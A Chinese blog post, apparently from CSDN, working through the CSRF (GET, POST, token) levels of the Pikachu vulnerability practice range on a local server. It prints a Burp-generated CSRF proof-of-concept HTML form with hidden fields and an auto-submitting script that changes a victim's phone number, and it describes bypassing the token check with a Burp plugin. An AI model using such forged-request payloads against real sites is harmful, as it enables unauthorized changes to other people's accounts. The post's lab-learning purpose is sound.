pikachu靶场——SCRF

最新推荐文章于 2024-08-31 23:25:02 发布
最新推荐文章于 2024-08-31 23:25:02 发布
阅读量333 收藏 4
点赞数 13
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78439049/article/details/140829797
版权

SCRF(get)

查看提示,了解到了一些用户和其密码,登录我们老大kobe的账户:

点击修改信息用burp抓包,

使用SCRF HTML生成器,生成一段url,将其中的phonenum改为666666

将生成的url发送给被攻击者

http://127.0.0.1:8080/pikachu-master/vul/csrf/csrfget/csrf_get.php

可以看到被攻击者的phonenum被修改:

SCRF(post)

同样还是先修改信息,抓包看一下:

此处为post传参,url不再显示,无法在使用伪造url的方法攻击。可以将生成的SCRF HTML放入自己写的HTML文件中,放在服务器上,并给用户请求者个html的链接

需要构造的SCRF.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1:8080/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="boy" />
      <input type="hidden" name="phonenum" value="999999" />
      <input type="hidden" name="add" value="nba&#32;lakes" />
      <input type="hidden" name="email" value="kobe&#64;pikachu&#46;com" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1:8080/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="boy" />
      <input type="hidden" name="phonenum" value="222222" />
      <input type="hidden" name="add" value="nba&#32;lakes" />
      <input type="hidden" name="email" value="kobe&#64;pikachu&#46;com" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

将写好的html文件放在pikachu目录下

访问该url

http://127.0.0.1:8080/pikachu-master/SCRF.html

点击submit request,完成攻击,可看到手机号被修改

SCRF(token)

与前面相同修改信息,抓包,看抓到的包中的数据,发现了token,删除token,发现不能修改。

这关需要用到burp中的插件SCRF Token Tracker,设置如下:

开启插件。将phonenum改为123456

可看到成功修改,攻击成功。

huayidaocaihong
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu平台之csrf
qq_42728977的博客
12-16 1982
概述 参考链接 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 场景例子 lucy想要在购物网站上修改购物地址,这个操作是lucy通过浏览器向后端发送了请求。...
Pikachu之CSRF
weixin_44940180的博客
07-05 5673
CSRF漏洞概述 Cross-site request forgery简称为“CSRF”,跨站请求伪造 在CSRF的攻击场景中攻击者会伪造一个请求 (这个请求一般是一个链接) 然后欺骗目标用户进行攻击,用户一旦点击了这个请求 整个攻击也就完成了 所以CSRF攻击也被称为“one click”攻击 为什么会出现CSRF漏洞 一方面,用户安全意识不足,访问不知名的url 另一方面,web没有做到准确的合法用户验证 CSRF与XSS的区别: CSRF攻击者并没有拿到用户的权限,是借用户的权限完成攻击;而XSS可以
pikachu之CSRF
qq_43665434的博客
02-08 682
pikachu之CSRF 文章目录pikachu之CSRF一、神魔是CSRF?二、地位三、场景四、比xss何如?五、如何确认存在CSRF六、靶场测试1、CSRF(get)2、CSRF(post)3、CSRF Token七、CSRF防范措施 一、神魔是CSRF? Cross-site request forgery,跨站请求伪造,攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 二、地位
Pikachu靶场之CSRF漏洞详解
m0_46467017的博客
05-16 7947
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 1274
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 870
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
Pikachu靶场——文件上传漏洞_pikachu文件上传漏洞(1),网络安全开发避坑指南
m0_60750088的博客
04-18 352
我们在这里查看浏览按钮,可以看出这里有一个对应的判断,当input标签去onchange,发生改变的时候,他就回去调用checkFileExt,我们可以把checkFileExt函数删掉,这和我们之前XSS漏洞的时候修改限制字数一样。这个PHP文件上传成功后,就和前面的一样,我们可以通过访问这个PHP文件,传参,通过一句话木马来控制服务器。上传一个正常的图片,去抓一下它的content-type,然后我们再去上传一下我们的一句话木马。进入第一关有一个文件上传的按钮,先看一下直接上传php文件是个什么效果。
Pikachu靶场——文件上传漏洞_pikachu文件上传漏洞,2024年最新网络安全开发中常见的一些问题面试专题
2401_84181481的博客
04-10 760
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Pikachu实验过程重现(Burp suit的具体介绍)
gl620321的博客
03-24 1847
暴力破解漏洞的解析 一.暴力破解漏洞的原理 1.连续性尝试+字典+自动化 字典(自己要在网上查找资源并且在学习过程中收集属于自己的字典)字典可以提高暴力破解的效率 (1).常用的账号密码(弱口令),比如常用用户名和密码,在网上收集 (2).互联网被脱裤后账号密码 二.暴力破解漏洞的测试流程 三.基于表单的暴力破解(基于burp suite) 四.暴力破解安全验证码分析 五.暴力破解常见的防范措施@...
实验34:通过csrf进行地址修改实验演示
qq_44720671的博客
04-29 517
通过csrf进行地址修改 一、get型 我们以pikachu为例,打开CSRF(get) login 我们先用正确的账号密码进行登录,转到个人信息界面 我们利用burp suite进行抓包, 将get请求找到,然后自己注册一个账号,拿到修改个人信息的链接,这样可以修改成: 然后把这个链接发给A,若A在登录状态,并且打开链接,那么A的个人信息就会被修改掉: 二、post型 打开pikach...
Pikachu漏洞练习平台实验——CSRF(三)
dishan4749253的博客
09-25 4916
概述   - 攻击场景例子   - CSRF攻击需要条件   - CSRF和XSS的区别   - 如何确认一个目标站点是否有CSRF漏洞 CSRF(get) CSRF(post) CSRF(token) 防护措施 概述 CSRF 是Cross Site Request Forgery的 简称,中文...
Csrf漏洞概述及其原理
gl620321的博客
05-01 7077
一.Csrf漏洞的概述 1.CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,C...
CSRF环境搭建及攻击测试
weixin_50341025的博客
04-15 640
一、环境搭建 1.pikachu-scrf实验模块 2.kali-apache搭建 apt-get update apt-get install apache2 service apache2 start 开启服务 php -version 应该打印出版本结果 cd /var/www/html 进入web根目录 将测试页面放入目录 3.测试网络是否可以打开 本机:http://192.168.75.1/pp/ Kali: http://192.168.75.128/csrgtest.php 二、
pikachu---CSRF漏洞
m0_52822871的博客
09-01 354
一.定义 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
最新发布
逝水无痕博客
08-31 1070
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 1053
SaveButton 安全控件说明
pikachu靶场介绍
04-15
Pikachu靶场是一个开源的网络安全漏洞扫描框架,用于评估和测试网络应用程序的安全性。它由Python编写,提供了一系列功能强大的工具和模块,可以帮助安全研究人员和渗透测试人员发现和利用各种常见的Web应用程序漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值